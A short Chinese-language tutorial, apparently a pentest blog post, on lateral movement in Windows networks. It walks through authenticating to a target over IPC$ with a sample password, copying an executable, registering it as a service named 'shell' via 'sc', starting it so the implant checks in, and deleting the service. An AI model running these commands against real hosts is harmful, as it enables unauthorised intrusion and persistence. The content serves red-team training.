利用windows服务之SC进行横向
0x01 前言
利用windows服务进行横向渗透主要是通过sc命令,但是注意这里跟之前windows远程命令相比多了一个条件,即当前主机需要为administrator权限。
0x02 sc命令
sc命令是XP系统中功能强大的DOS命令,SC命令能与“服务控制器”和已安装设备进行通讯。SC是用于与服务控制管理器和服务进行通信的命令行程序。
利用sc命令进行横向渗透的大体流程如下:
1.与靶机建立ipc连接
1 | net use \\10.1.10.7\ipc$ "1qaz@WSX" /user:fzm\user1 |
data:image/s3,"s3://crabby-images/c01b7/c01b705a4746d5e4949f7511b930155d98256e3b" alt="image-20221102101445322"
2.拷贝exe到主机系统上
data:image/s3,"s3://crabby-images/7e083/7e08372cc40150ce0dfd82754335a5265d4f936e" alt="image-20221102101459585"
3.在靶机上创建一个shell的服务
1 | sc \\win7 create shell binpath= "c:\abc.exe" |
data:image/s3,"s3://crabby-images/9fea5/9fea57e79145be68d5cfcfefd84d5436e1e10c05" alt="image-20221102101801488"
4.启动shell服务
1 | sc \\win7 start shell |
data:image/s3,"s3://crabby-images/ec133/ec133910ae105fd4b9d2ed2c81300405d80761db" alt="image-20221102102032987"
成功上线
5.删除创建的shell服务
1 | sc \\win7 delete shell |
data:image/s3,"s3://crabby-images/c440a/c440ae69a80e563acf10e2dba8a3b62cc75d9a28" alt="image-20221102102117550"